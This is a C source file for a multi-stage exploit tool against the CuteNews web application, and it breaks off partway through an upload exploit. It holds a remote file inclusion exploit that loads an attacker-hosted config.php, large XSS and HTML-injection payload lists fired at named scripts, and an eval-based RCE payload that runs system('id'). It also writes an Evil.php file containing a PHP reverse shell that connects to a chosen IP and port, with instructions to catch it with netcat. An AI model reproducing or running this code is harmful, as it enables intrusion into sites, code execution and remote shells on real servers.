# gcc XenoCute.c argparse.c -o XenoCute -lcurl
# ./XenoCute -u http://127.0.0.1
NOTE : This project focuses on exploiting multiple vulnerabilities in the CuteNews service. If a CVE appears more than once, it may indicate additional vulnerabilities are included.
File: xenoCute.c — Size: 46,1 KB — Lines: 1248
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <net/if.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <ifaddrs.h>
#include <time.h>
#include <regex.h>
#include <curl/curl.h>
#include "argparse.h"
#define BUFFER_SIZE 100000
#define FULL_URL 2048
#define RESPONSE_CODE 10000
#define CONTENT 500
#define DATA 200
struct Mem {
char *buffer;
size_t len;
};
//File Log
void log_to_file(const char *message)
{
FILE *file = fopen("exploit.log","a");
if (!file)
{
perror("\e[0;31m[-] Error opening exploit.log");
return;
}
time_t now = time(NULL);
char *ts = ctime(&now);
ts[strlen(ts) - 1] = '\0';
fprintf(file,
"[%s] %s\n",
ts,
message);
fclose(file);
}
void print_slow(const char* str)
{
while (*str) {
putchar(*str);
fflush(stdout);
usleep(100000);
str++;
}
}
//Get ip and Mac Address
void info()
{
struct ifaddrs *ifaddr, *ifa;
char ip[INET_ADDRSTRLEN];
char mac[18];
if (getifaddrs(&ifaddr) == -1)
{
printf("\e[0;31m[-] Error get ip address\n");
return;
}
for (ifa = ifaddr; ifa != NULL; ifa = ifa->ifa_next)
{
if (ifa->ifa_addr == NULL)
continue;
if (ifa->ifa_addr->sa_family == AF_INET)
{
struct sockaddr_in *sa = (struct sockaddr_in *)ifa->ifa_addr;
inet_ntop(AF_INET,
&sa->sin_addr,
ip,
sizeof(ip));
int fd = socket(AF_INET,
SOCK_DGRAM,
0);
struct ifreq ifr;
memset(&ifr,
0,
sizeof(ifr));
strncpy(ifr.ifr_name,
ifa->ifa_name,
IFNAMSIZ - 1);
if (ioctl(fd, SIOCGIFHWADDR, &ifr) == 0)
{
unsigned char *hwaddr = (unsigned char *)ifr.ifr_hwaddr.sa_data;
snprintf(mac,
sizeof(mac),
"%02X:%02X:%02X:%02X:%02X:%02X",
hwaddr[0],
hwaddr[1],
hwaddr[2],
hwaddr[3],
hwaddr[4],
hwaddr[5]);
char message[256];
snprintf(message,
sizeof(message),
"\e[0;36m[+] Your IP: %s | Interface: %s | MAC: %s",
ip, ifa->ifa_name,
mac);
log_to_file(message);
}
close(fd);
}
}
freeifaddrs(ifaddr);
}
size_t write_to_str(void *ptr,
size_t size,
size_t nmemb,
void *userdata)
{
size_t total = size * nmemb;
strncat((char *)userdata,
(char *)ptr,
total);
return total;
}
size_t write_cb(void *ptr,
size_t size,
size_t nmemb,
void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer,
m->len + total + 1);
if (!tmp) return 0;
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
int fetch_page(const char *url,
struct Mem *page)
{
CURL *curl = curl_easy_init();
if (!curl) {
fprintf(stderr, "\e[0;31m[-] Curl initialization failed\n");
log_to_file("\e[0;31m[-] Curl initialization failed\n");
return 1;
}
curl_easy_setopt(curl,
CURLOPT_URL,
url);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
page);
CURLcode res = curl_easy_perform(curl);
if (res != CURLE_OK)
{
fprintf(stderr,
"\e[0;31m[-] HTTP request failed: %s\n",
curl_easy_strerror(res));
curl_easy_cleanup(curl);
return 1;
}
curl_easy_cleanup(curl);
return 0;
}
char *find_version(const char *url)
{
CURL *curl = curl_easy_init();
if (!curl) return NULL;
char buffer[BUFFER_SIZE];
buffer[0] = '\0';
curl_easy_setopt(curl,
CURLOPT_URL,
url);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_to_str);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
buffer);
if (curl_easy_perform(curl) != CURLE_OK)
{
curl_easy_cleanup(curl);
return NULL;
}
curl_easy_cleanup(curl);
regex_t re;
if (regcomp(&re,
"CuteNews[ ]*([0-9]+\\.[0-9]+(\\.[0-9]+)?)",
REG_EXTENDED | REG_ICASE)) {
return NULL;
}
regmatch_t m[2];
char *version = NULL;
if (regexec(&re, buffer, 2, m, 0) == 0)
{
size_t len = m[1].rm_eo - m[1].rm_so;
version = malloc(len + 1);
if (version) {
strncpy(version, buffer + m[1].rm_so, len);
version[len] = '\0';
}
}
regfree(&re);
return version;
}
// Exploit version 0.88
// vulnerability RFI
void exploit_RFI_0_88(const char *base_url,
const char *payload_url)
{
CURL *curl;
CURLcode res;
char full_url[FULL_URL];
const char *scripts[] = { "comments.php", "search.php", "shownews.php" };
int num_scripts = sizeof(scripts) / sizeof(scripts[0]);
printf("\e[0;37m---------------------------------------------------------------------\n");
printf("\e[0;36m[+] Attempting RFI Exploitation on CuteNews across multiple scripts\n");
printf("\e[0;36m[+] Make sure you are hosting your payload via HTTP server\n");
printf("\e[0;36m[+] Example: python3 -m http.server 8080\n");
printf("\e[0;36m[+] Place your malicious config.php at the root of the server\n\n");
log_to_file("\e[0;37m---------------------------------------------------------------------\n");
log_to_file("\e[0;36m[+] Attempting RFI Exploitation on CuteNews across multiple scripts\n");
log_to_file("\e[0;36m[+] Make sure you are hosting your payload via HTTP server\n");
log_to_file("\e[0;36m[+] Example: python3 -m http.server 8080\n");
log_to_file("\e[0;36m[+] Place your malicious config.php at the root of the server\n\n");
for (int i = 0; i < num_scripts; i++)
{
printf("\e[0;37m---------------------------------------------------------------------\n");
printf("\e[0;34m[+] Trying script: %s\n",
scripts[i]);
snprintf(full_url, sizeof(full_url),
"%s/%s?cutepath=%s",
base_url,
scripts[i],
payload_url);
log_to_file("\e[0;34m[+] Trying script\n");
printf("\e[0;32m[+] Full Exploit URL: %s\n",
full_url);
log_to_file("\e[0;32m[+] Full Exploit URL :\n");
log_to_file(full_url);
curl = curl_easy_init();
long httpCode = 0;
if (curl)
{
curl_easy_setopt(curl,
CURLOPT_URL,
full_url);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
res = curl_easy_perform(curl);
if (res != CURLE_OK)
{
fprintf(stderr,
"\e[0;31m[-] Request failed for %s: %s\n",
scripts[i],
curl_easy_strerror(res));
log_to_file("\e[0;31m[-] Request failed\n");
}
else
{
printf("\e[0;36m[+] Exploit request sent successfully for %s!\n",
scripts[i]);
log_to_file("\e[0;36m[+] Exploit request sent successfully !\n");
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[0;36m[+] Http Response Code : %ld\n",
httpCode);
}
curl_easy_cleanup(curl);
}
else
{
fprintf(stderr,
"\e[0;33m[!] Failed to initialize CURL for %s.\n",
scripts[i]);
log_to_file("\e[0;33m[!] Failed to initialize CURL.\n");
}
}
}
// Exploit version 0.88/1.3
// Vulnerability XSS
void exploit_XSS_0_88(const char *url)
{
CURL *curl;
CURLcode res;
char full_url[FULL_URL];
char response[RESPONSE_CODE] = {0};
printf("\e[0;37m---------------------------------------------------------------------\n");
log_to_file("\e[0;37m---------------------------------------------------------------------\n");
printf("\e[0;36m[+] Attempting XSS Exploitation (0.88)...\n\n");
log_to_file("\e[0;36m[+] Attempting XSS Exploitation (0.88) ...\n\n");
const char *payload[] =
{
"<script>alert(document.cookie);</script>",
"<img src=x onerror=alert(1)>",
"<svg onload=alert(1)>",
"\"><script>alert(1)</script>",
"';alert(1);//",
"\"><img src=x onerror=alert(document.domain)>",
"<body onload=alert('XSS')>",
"<details open ontoggle=alert('XSS')>",
"<object data=javascript:alert(1)>",
"<embed src=javascript:alert(1)>",
"<link rel=stylesheet href=data:text/css,*{animation-name:alert(1)}>",
"<style>@keyframes x{}</style><div style='animation-name:x' onanimationstart=alert(1)></div>",
"<input autofocus onfocus=alert('XSS')>",
"<video><source onerror=\"javascript:alert(1)\"></video>",
"<iframe src=javascript:alert(1)>",
"<scr<script>ipt>alert(1)</scr</script>ipt>",
"<script>/*-≶><!]]>*/alert(1)//<!</script>",
"<svg><desc><![CDATA[><script>alert(1)</script>]]></desc></svg>",
"<math><mi//xlink:href=\"data:x,alert(1)\"></math>",
"<iframe srcdoc='<script>alert(1)</script>'></iframe>",
"<object type='text/html' data='data:text/html,<script>alert(1)</script>'></object>",
"<form><button formaction='javascript:alert(1)'>ClickMe</button></form>",
"<img src=x onerror=confirm(1)>",
"<audio src onerror=prompt(1)>",
"<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></iframe>",
"`'><script>\xE2\x80\x84javascript:alert(1)</script>",
"`'><script>\xE3\x80\x80javascript:alert(1)</script>",
"`'><script>\x09javascript:alert(1)</script>",
"`'><script>\xE2\x80\x89javascript:alert(1)</script>",
"`'><script>\xE2\x80\x85javascript:alert(1)</script>",
"`'><script>\xE2\x80\x88javascript:alert(1)</script>",
"`'><script>\x00javascript:alert(1)</script>",
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>",
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>",
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>",
"<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<object src=1 href=1 onerror=\"javascript:alert(1)\"></object>",
"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>",
"<svg onResize svg onResize=\"javascript:javascript:alert(1)\"></svg onResize>",
"<title onPropertyChange title onPropertyChange=\"javascript:javascript:alert(1)\"></title onPropertyChange>",
"<iframe onLoad iframe onLoad=\"javascript:javascript:alert(1)\"></iframe onLoad>",
"<body onMouseEnter body onMouseEnter=\"javascript:javascript:alert(1)\"></body onMouseEnter>",
"<body onFocus body onFocus=\"javascript:javascript:alert(1)\"></body onFocus>",
"<frameset onScroll frameset onScroll=\"javascript:javascript:alert(1)\"></frameset onScroll>",
"<script onReadyStateChange script onReadyStateChange=\"javascript:javascript:alert(1)\"></script onReadyStateChange>",
"<html onMouseUp html onMouseUp=\"javascript:javascript:alert(1)\"></html onMouseUp>",
"<body onPropertyChange body onPropertyChange=\"javascript:javascript:alert(1)\"></body onPropertyChange>",
"<svg onLoad svg onLoad=\"javascript:javascript:alert(1)\"></svg onLoad>",
"<body onPageHide body onPageHide=\"javascript:javascript:alert(1)\"></body onPageHide>",
"<body onMouseOver body onMouseOver=\"javascript:javascript:alert(1)\"</body onMouseOver>",
"<body onUnload body onUnload=\"javascript:javascript:alert(1)\"></body onUnload>",
"<body onLoad body onLoad=\"javascript:javascript:alert(1)\"></body onLoad>",
"<bgsound onPropertyChange bgsound onPropertyChange=\"javascript:javascript:alert(1)\"></bgsound onPropertyChange>",
"<html onMouseLeave html onMouseLeave=\"javascript:javascript:alert(1)\"></html onMouseLeave>",
"<html onMouseWheel html onMouseWheel=\"javascript:javascript:alert(1)\"></html onMouseWheel>",
"<style onLoad style onLoad=\"javascript:javascript:alert(1)\"></style onLoad>",
"<iframe onReadyStateChange iframe onReadyStateChange=\"javascript:javascript:alert(1)\"></iframe onReadyStateChange>",
"<body onPageShow body onPageShow=\"javascript:javascript:alert(1)\"></body onPageShow>",
"<style onReadyStateChange style onReadyStateChange=\"javascript:javascript:alert(1)\"></style onReadyStateChange>",
"<frameset onFocus frameset onFocus=\"javascript:javascript:alert(1)\"></frameset onFocus>",
"<applet onError applet onError=\"javascript:javascript:alert(1)\"></applet onError>",
"<marquee onStart marquee onStart=\"javascript:javascript:alert(1)\"></marquee onStart>",
"�",
"<form><input type=\"date\" onfocus=\"alert(1)\"></form>",
"<form><textarea onkeyup='alert(1)'></textarea></form>",
"<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script>"
};
int numberPayloads = sizeof(payload) / sizeof(payload[0]);
typedef struct
{
const char *file;
const char *parameter;
}Target;
Target targets[] = {
{ "example1.php" , "subaction=showfull&id=%s" },
{ "example2.php" , "subaction=showfull&id=%s" },
{ "index.php" , "mod=%s" },
{ "show_archives.php" , "subaction=showcomments&id=%s" }
};
int numberScripts = sizeof(targets) / sizeof(targets[0]);
for (int f = 0; f < numberScripts; f++)
{
for (int p = 0; p < numberPayloads; p++)
{
printf("\e[0;34m[+] Trying script: %s with payload: %s\n",
targets[f].file,
payload[p]);
char formatted_param[1024];
snprintf(formatted_param,
sizeof(formatted_param),
targets[f].parameter,
payload[p]);
snprintf(full_url,
sizeof(full_url),
"%s/%s?%s",
url,
targets[f].file,
formatted_param);
printf("\e[0;32m[+] Full XSS URL: %s\n",
full_url);
curl = curl_easy_init();
if (curl)
{
memset(response,0,sizeof(response));
curl_easy_setopt(curl,
CURLOPT_URL,
full_url);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
response);
res = curl_easy_perform(curl);
if (res != CURLE_OK)
{
fprintf(stderr,
"\e[0;31m[-] Request failed: %s\n",
curl_easy_strerror(res));
log_to_file("\e[0;31m[-] Request failed\n");
} else
{
printf("\e[0;36m[+] Request sent successfully!\n");
log_to_file("\e[0;36m[+] Request sent successfully!\n");
if (strstr(response,payload[p]) != NULL)
{
printf("\e[0;36m[+] Possible XSS Injection detected with payload: %s\n",
payload[p]);
log_to_file("\e[0;36m[+] Possible XSS Injection\n");
}
else
{
printf("\e[0;31m[-] Payload not reflected in response\n");
log_to_file("\e[0;31m[-] Payload not reflected in response\n");
}
}
curl_easy_cleanup(curl);
} else
{
fprintf(stderr,
"\e[0;33m[!] Failed to initialize CURL\n");
log_to_file("\e[0;33m[!] Failed to initialize CURL\n");
}
}
}
}
//Exploit version 1.1.1
// Vulnerability RCE
void exploit_RCE_1_1_1(const char *url)
{
CURL *curl;
CURLcode res;
char full_url[FULL_URL];
const char *payload = "text=%3C!--%7B%24%7Beval($s)%7D%7D--%3E&s=system('id')";
printf("\e[0;37m---------------------------------------------------------------------\n");
log_to_file("\e[0;37m---------------------------------------------------------------------\n");
printf("\e[0;36m[+] Attempting RCE Exploitation (1.1.1)...\n\n");
log_to_file("\e[0;36m[+] Attempting RCE Exploitation (1.1.1) ...\n\n");
snprintf(full_url,
sizeof(full_url),
"%s/strawberry/plugins/wacko/highlight/html.php?%s",
url,
payload);
printf("\e[0;36m[+] Sending exploit to: %s\n",
full_url);
log_to_file("\e[0;36m[+] Sending exploit\n");
curl = curl_easy_init();
if (curl)
{
curl_easy_setopt(curl,
CURLOPT_URL,
full_url);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
res = curl_easy_perform(curl);
long httpCode = 0;
if (res != CURLE_OK)
{
fprintf(stderr,
"\e[0;31m[-] Request failed: %s\n",
curl_easy_strerror(res));
log_to_file("\e[0;31m[-] Request failed: \n");
}
else
{
printf("\e[0;36m[+] Exploit sent successfully!\n");
log_to_file("\e[0;36m[+] Exploit sent successfully!\n");
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[0;32m=> Http Response Code : %ld\n",
httpCode);
}
curl_easy_cleanup(curl);
}
else
{
fprintf(stderr, "\e[0;33m[!] Failed to initialize CURL\n");
log_to_file("\e[0;33m[!] Failed to initialize CURL\n");
}
}
const char *payload[] = {
"<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,32,66,121,112,97,115,115,39,41))>",
"<script type=\"text/javascript\">javascript:alert(1);</script>",
"<script type=\"text/javascript\">javascript:alert(1);</script>",
"<script type=\"text/javascript\">javascript:alert(1);</script>",
"<script type=\"text/javascript\">javascript:alert(1);</script>",
"<script type=\"text/javascript\">javascript:alert(1);</script>",
"<script type=\"text/javascript\">javascript:alert(1);</script>",
"<script type=\"text/javascript\">javascript:alert(1);</script>",
"<script type=\"text/javascript\">javascript:alert(1);</script>",
"<img src=\"x\" onerror=prompt(8)>",
"<img src=\"x\" onerror=prompt(8)>",
"<img src=\"x\" onerror=prompt(8)>",
"<img src=\"x\" onerror=prompt(8)>",
"<img src=\"q\" onerror=prompt(8)>",
"<img src=\"q\" onerror=prompt(8)>",
"<html onmouseleave=\"javascript:alert(1)\"></html>",
"<html onwheel=\"javascript:alert(1)\"></html>",
"<style onload=\"javascript:alert(1)\"></style>",
"<iframe onreadystatechange=\"javascript:alert(1)\"></iframe>",
"<body onpageshow=\"javascript:alert(1)\"></body>",
"<style onreadystatechange=\"javascript:alert(1)\"></style>",
"<frameset onfocus=\"javascript:alert(1)\"></frameset>",
"<applet onerror=\"javascript:alert(1)\"></applet>",
"<marquee onstart=\"javascript:alert(1)\"></marquee>",
"<script onload=\"javascript:alert(1)\"></script>",
"<html onmouseover=\"javascript:alert(1)\"></html>",
"<html onmouseenter=\"javascript:parent.alert(1)\"><html>",
"<body onbeforeunload=\"javascript:alert(1)\"></body>",
"<html onmousedown=\"javascript:alert(1)\"></html>",
"<marquee onscroll=\"javascript:alert(1)\"></marquee>",
"<xml onpropertychange=\"javascript:alert(1)\"></xml>",
"<frameset onblur=\"javascript:alert(1)\"></frameset>",
"<applet onreadystatechange=\"javascript:alert(1)\"></applet>",
"<svg onunload=\"javascript:alert(1)\"></svg>",
"<html onmouseout=\"javascript:alert(1)\"></html>",
"<body onmousemove=\"javascript:alert(1)\"></body>",
"<body onresize=\"javascript:alert(1)\"></body>",
"<object onerror=\"javascript:alert(1)\"></object>",
"<body onpopstate=\"javascript:alert(1)\"></body>",
"<html onmousemove=\"javascript:alert(1)\"></html>",
"<applet onreadystatechange=\"javascript:alert(1)\"></applet>",
"<body onpagehide=\"javascript:alert(1)\"></body>",
"<svg onunload=\"javascript:alert(1)\"></svg>",
"<applet onerror=\"javascript:alert(1)\"></applet>",
"<script>if(\"x\\xE1\\x96\\x89\".length == 2) { javascript:alert(1); }</script>",
"<script>if(\"x\\xE0\\xB9\\x92\".length == 2) { javascript:alert(1); }</script>",
"<script>if(\"x\\xEE\\xA9\\x93\".length == 2) { javascript:alert(1); }</script>",
"ABC<div style=\"x:expression(javascript:alert(1))\">DEF",
"ABC<div style=\"x:expression(javascript:alert(1))\">DEF",
"ABC<div style=\"x:expression(javascript:alert(1))\">DEF",
"ABC<div style=\"x:expression(javascript:alert(1))\">DEF",
"ABC<div style=\"x:expression(javascript:alert(1))\">DEF",
"ABC<div style=\"x:expression(javascript:alert(1))\">DEF",
"ABC<div style=\"x:expression(javascript:alert(1))\">DEF",
"ABC<div style=\"x:expression(javascript:alert(1))\">DEF",
"<a href=\"javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"<a href=\"javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
"`'><img src=\"xxx:x\" onerror=javascript:alert(1)>",
"`'><img src=\"xxx:x\" onerror=javascript:alert(1)>",
"`'><img src=\"xxx:x\" onerror=javascript:alert(1)>",
"`'><img src=\"xxx:x\" onerror=javascript:alert(1)>",
"`'><img src=\"xxx:x\" onerror=javascript:alert(1)>",
"`'><img src=\"xxx:x\" onerror=javascript:alert(1)>",
};
// exploit HTML injection
// version 1.3
// Vulnerability HTML INJECTION
void exploit_html_injection1_3(const char *url)
{
CURL *curl;
CURLcode res;
char full_url[FULL_URL];
char formatt[FULL_URL];
char response[RESPONSE_CODE] = {0};
printf("\e[0;37m---------------------------------------------------------------------\n");
log_to_file("\e[0;37m---------------------------------------------------------------------\n");
printf("\e[0;36m[+] Exploit HTML Injection....\n");
int numberPayloads = sizeof(payload) / sizeof(payload[0]);
typedef struct {
const char *file;
const char *parameter_format;
} Targets;
Targets targets[] = {
{"show_news.php", "subaction=addcomment&name=UserName&comments=%s&id=1078525267||1090074219|UserName|none|127.0.0.1||"}
};
int numberScripts = sizeof(targets) / sizeof(targets[0]);
long httpCode = 0;
for (int f = 0; f < numberScripts; f++)
{
for (int p = 0; p < numberPayloads; p++)
{
snprintf(formatt,
sizeof(formatt),
targets[f].parameter_format,
payload[p]);
snprintf(full_url,
sizeof(full_url),
"%s/%s?%s",
url,
targets[f].file,
formatt);
printf("\e[0;32m[+] Full XSS URL: %s\n",
full_url);
log_to_file("\e[0;32m[+] Full XSS URL : \n");
log_to_file(full_url);
curl = curl_easy_init();
if (curl)
{
curl_easy_setopt(curl,
CURLOPT_URL,
full_url);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
response);
res = curl_easy_perform(curl);
if (res != CURLE_OK)
{
fprintf(stderr,
"\e[0;31m[-] Request failed: %s\n",
curl_easy_strerror(res));
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[0;32m=> HTTP CODE : %ld\n", httpCode);
log_to_file("\e[0;31m[-] Request failed \n");
} else
{
printf("\e[0;36m[+] Request sent successfully!\n");
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[0;32m=> HTTP CODE : %ld\n", httpCode);
log_to_file("\e[0;36m[+] Request sent successfully!\n");
if (strstr(response,
payload[p]) != NULL) {
printf("\e[0;36m[+] Possible XSS / Html Injection detected with payload: %s\n",
payload[p]);
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[0;32m=> HTTP CODE : %ld\n", httpCode);
log_to_file("\e[0;36m[+] Possible XSS / Html Injection \n");
} else
{
printf("\e[0;31m[-] Payload not reflected in response\n");
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[0;32m=> HTTP CODE : %ld\n", httpCode);
log_to_file("\e[0;31m[-] Payload not reflected in response\n");
}
}
curl_easy_cleanup(curl);
memset(response,
0,
sizeof(response));
} else {
fprintf(stderr,
"\e[0;33m[!] Failed to initialize CURL.\n");
log_to_file("\e[0;33m[!] Failed to initialize CURL.\n");
}
}
}
}
// version 1.3
// Vulnerability INFO DISCLOSURE
void exploit_info_disclosure1_3(const char *url)
{
CURL *curl;
CURLcode res;
char full_url[FULL_URL];
char response[RESPONSE_CODE] = {0};
printf("\e[0;37m---------------------------------------------------------------------\n");
log_to_file("\e[0;37m---------------------------------------------------------------------\n");
printf("\e[0;36m[+] Exploit Info Disclosure...\n");
log_to_file("\e[0;36m[+] Exploit Info Disclosure...\n");
snprintf(full_url,
sizeof(full_url),
"%s/index.php?debug",
url);
printf("\e[0;36m[+] Sending request to: %s\n",
full_url);
log_to_file("\e[0;36m[+] Sending request : \n");
log_to_file(full_url);
curl = curl_easy_init();
if (curl) {
curl_easy_setopt(curl,
CURLOPT_URL,
full_url);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
response);
res = curl_easy_perform(curl);
long httpCode = 0;
if (res != CURLE_OK)
{
fprintf(stderr,
"\e[0;31m[-] Request failed: %s\n",
curl_easy_strerror(res));
log_to_file("\e[0;31m[-] Request failed\n");
}
else
{
printf("\e[0;36m[+] Request sent successfully!\n");
log_to_file("\e[0;36m[+] Request sent successfully!\n");
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[0;32m=> HTTP response code: %ld\n",
httpCode);
if (strstr(response, "PHP Version") != NULL || strstr(response, "System") != NULL)
{
printf("\e[0;36m[+] Possible phpinfo() exposure detected!\n");
log_to_file("\e[0;36m[+] Possible phpinfo() exposure detected!\n");
}
else
{
printf("\e[0;31m[-] No phpinfo() signs found in response.\n");
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[0;32m=> HTTP response code: %ld\n",
httpCode);
log_to_file("\e[0;31m[-] No phpinfo() signs found in response.\n");
}
}
curl_easy_cleanup(curl);
} else {
fprintf(stderr, "\e[0;33m[!] Failed to initialize CURL.\n");
log_to_file("\e[0;33m[!] Failed to initialize CURL.\n");
}
}
// version 1.3.1
// Vulnerability XSS
void xss1_3_1(const char *UrlInput)
{
CURL *curl;
CURLcode res;
char full[FULL_URL];
char response[RESPONSE_CODE];
long httpCode = 0;
int numberP = sizeof(payload) / sizeof(payload[0]);
printf("\e[0;37m---------------------------------------------------------------------\n");
log_to_file("\e[0;37m---------------------------------------------------------------------\n");
printf("\e[0;36m[+] Exploit XSS (1.3.1)...\n");
log_to_file("\e[0;36m[+] Exploit XSS (1.3.1)...\n");
for (int p = 0; p < numberP; p++)
{
snprintf(full, sizeof(full),
"%s/show_archives.php?archive=%s&subaction=list-archive&",
UrlInput, payload[p]);
printf("\e[0;36m[+] Testing injection on parameter: show_archives.php\n");
log_to_file("\e[0;36m[+] Testing injection on parameter: show_archives.php\n");
printf("\e[0;32m[+] Full target URL: %s\n",
full);
log_to_file("\e[0;32m[+] Full target URL: \n");
log_to_file(full);
printf("\e[0;36m[+] Payload for XSS: %s\n",
payload[p]);
curl = curl_easy_init();
if (!curl)
{
fprintf(stderr, "\e[0;31m[-] Curl initialization failed\n");
log_to_file("\e[0;31m[-] Curl initialization failed\n");
exit(1);
}
memset(response, 0, sizeof(response));
curl_easy_setopt(curl,
CURLOPT_URL,
full);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
response);
res = curl_easy_perform(curl);
if (res == CURLE_OK)
{
printf("\e[0;36m[+] Request sent successfully!\n");
log_to_file("\e[0;36m[+] Request sent successfully!\n");
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode);
printf("\e[0;32m=> HTTP Code Response: %ld\n",
httpCode);
if (strstr(response, payload[p]) != NULL)
{
printf("\e[0;32m[+] Possible XSS injection detected with payload: %s\n",
payload[p]);
log_to_file("\e[0;32m[+] Possible XSS injection detected \n");
}
}
else
{
printf("\e[0;31m[-] Request failed: %s\n",
curl_easy_strerror(res));
log_to_file("\e[0;31m[-] Request failed: \n");
}
curl_easy_cleanup(curl);
}
}
// version 2.0.3
// Vulnerability Remote File Upload
void remote_file_upload(const char *url_login,
const char* ip,
int port)
{
const char *username = "test"; // Change user Login (User)
const char *password = "837201"; // password
const char *filename = "Evil.php"; //name file
const char *cookieFile = "cookies.txt"; //File cookie (login)
char login_data[DATA];
char full[FULL_URL];
char url_upload[FULL_URL];
long httpCode = 0 ;
const char *up = "/index.php/uploads/Evil.php";
char content[CONTENT];
CURLcode res;
CURL *curl = curl_easy_init();
printf("\e[0;37m---------------------------------------------------------------------\n");
log_to_file("\e[0;37m---------------------------------------------------------------------\n");
printf("\e[0;36m[+] Exploit Remote File Upload (2.0.3)...\n");
log_to_file("\e[0;36m[+] Exploit Remote File Upload (2.0.3)...\n");
snprintf(content, sizeof(content),
"php -r '$sock=fsockopen(\"%s\",%d);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
ip,
port);
FILE *file = fopen("Evil.php", "w");
if (file == NULL)
{
printf("\e[0;31m[-] Error Create File !!\n");
log_to_file("\e[0;31m[-] Error Create File !\n");
exit(1);
}
fprintf(file,
"%s",
content);
fclose(file);
printf("\e[0;37m---------------------------------------------------------------------\n");
printf("\e[0;36m[+] A file was created that will be branched in the server (Evil.php) and a reverse connection command was placed in it...\n");
printf("\e[0;36m[+] Don't forget to listen to the port using netcat command for example (nc -lvnp 444)\n");
